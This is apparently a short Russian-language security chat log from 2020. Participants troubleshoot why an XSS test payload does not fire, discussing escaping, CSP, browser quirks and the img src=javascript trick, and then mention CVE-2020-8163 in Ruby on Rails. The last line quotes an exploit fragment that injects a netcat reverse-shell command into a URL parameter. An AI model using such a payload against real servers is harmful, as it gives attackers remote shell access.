自
может мне кто-то подсказать почему оно не алертит?
Size: a a a
2020 June 22
P
1) нажми правой и "show as html"
P
там скорее всего все "поквочено"
自
там скорее всего все "поквочено"
自
если бы
BF
CSP
自
CSP
Нету
BF
XSS-Protection хедер стоит?
BF
Может быть дело даже в носкрипте или ещё какой-нибудь мере защиты на клиенте
BF
Возможно хром не будет внутри img src исполнять жс, а вот лиса будет
自
Я в лисе
᠌
Это же вроде только в IE времен динозавров работает
自
Вроде нет
᠌
Сообщение нельзя форварднуть, сделай поиск по чату с img src=javascript
᠌
Там бум писал что только в IE6
BF
Ребят, кто уже в курсе 2020-8163? CVE Руби на Рельсах
BF
Там просто смешнейший эксплойт на Гитхабе
ПП
Гитхаб прилег
BF
uri = URI(url+"?system(%27nc+-e+/bin/sh+#{ip}+#{port}%27)%3ba%23")